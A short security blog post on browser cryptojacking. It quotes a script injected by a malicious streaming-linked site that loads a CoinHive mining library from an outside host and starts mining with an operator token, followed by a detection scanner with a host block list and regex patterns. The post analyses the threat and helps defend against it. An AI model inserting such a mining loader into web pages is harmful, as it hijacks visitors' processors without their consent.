Beware of browser “miners”

Cryptocurrency “mining” is very popular today. More and more people “mine” it and make a profit. It is not rare for malware to install a “miner” on an infected workstation, turning it into a mining machine that generates profit for a threat actor.

But now anybody may become a victim of this tactic without being infected by malware, through browser mining.
How does it happen? A malicious web site injects a JS script that does the mining. A single browser miner is very inefficient, but if the number of such “accidental” miners is high, the expected profit may be measurable.

An example:
The web site “www.tyxihxxtpumgm[.]bid” is referred to by another streaming web site, and it injects the following script into the victim’s browser:

var mnr = document.createElement('script');
mnr.src = 'https://coin-hive.com/lib/coinhive.min.js';
mnr.onload = function() {
    var miner = CoinHive.Anonymous('T3z562MP2Zg1lIa7RUJy19d67woeZmJJ');
    miner.start();
};
document.getElementsByTagName('body')[0].appendChild(mnr);

You can see that the script contains a wallet address, but it is not a valid coin address. Apparently it is just a token that is linked to an actual wallet. The actual “miner” site is coin-hive[.]com. Of course, the actual registrant is hidden by a “whois protector”, and it was registered recently, on Aug 24, 2017. The site says: “A crypto Miner for your web site. Monetize your business with your users’ CPU power”. To me, that does not sound very friendly to users!

So if you see that your browser is sluggish and “eats” a lot of CPU resources, take a look: maybe your computer has been recruited to mine “coins” for somebody.
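
One way to take that look at a page's source without letting it run, as an added example (not code from the original post or from the site it describes): a static scan for the loader pattern shown above. The function names and the benign sample are assumptions made for illustration; the host and key indicators are taken from the injected script in this post.

```javascript
// Added example: static scan of page or script source for the loader pattern in this post.
// Indicators come from the injected script above; extend MINER_HOSTS for other miner hosts.
const MINER_HOSTS = ['coin-hive.com'];

function hostMatches(hostname) {
  // Exact host or a true subdomain; a lookalike such as "notcoin-hive.com" does not match.
  return MINER_HOSTS.some(h => hostname === h || hostname.endsWith('.' + h));
}

function findMinerIndicators(source) {
  const scriptUrls = new Set();
  const siteKeys = new Set();

  // Any quoted absolute URL: covers both <script src="..."> and el.src = '...'.
  for (const m of source.matchAll(/['"](https?:\/\/[^'"\s]+)['"]/g)) {
    try {
      if (hostMatches(new URL(m[1]).hostname)) scriptUrls.add(m[1]);
    } catch (e) { /* not a parsable URL, ignore */ }
  }

  // CoinHive.<Constructor>('<token>'): the token ties the hashing to the operator's account.
  for (const m of source.matchAll(/CoinHive\.\w+\s*\(\s*['"]([^'"]+)['"]/g)) {
    siteKeys.add(m[1]);
  }

  // Script element created and attached at runtime rather than present in the HTML.
  // Common on benign pages too, so it is reported as context and never flagged alone.
  const dynamicInjection =
    /createElement\s*\(\s*['"]script['"]\s*\)/i.test(source) && /\.appendChild\s*\(/.test(source);

  return {
    scriptUrls: [...scriptUrls],
    siteKeys: [...siteKeys],
    dynamicInjection,
    suspicious: scriptUrls.size > 0 || siteKeys.size > 0,
  };
}

// The script quoted in this post, used as sample input.
const SAMPLE_INJECTED = `
var mnr = document.createElement('script');
mnr.src = 'https://coin-hive.com/lib/coinhive.min.js';
mnr.onload=function(){ var miner=CoinHive.Anonymous('T3z562MP2Zg1lIa7RUJy19d67woeZmJJ'); miner.start(); };
document.getElementsByTagName('body')[0].appendChild(mnr);`;

// Constructed benign sample: dynamic script loading alone must not be flagged.
const SAMPLE_BENIGN = `
var s = document.createElement('script');
s.src = 'https://cdn.example.org/analytics.js';
document.head.appendChild(s);`;

console.log(findMinerIndicators(SAMPLE_INJECTED), findMinerIndicators(SAMPLE_BENIGN));
```

The same host list can be reused in a proxy or browser blocklist, so the library never loads in the first place.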
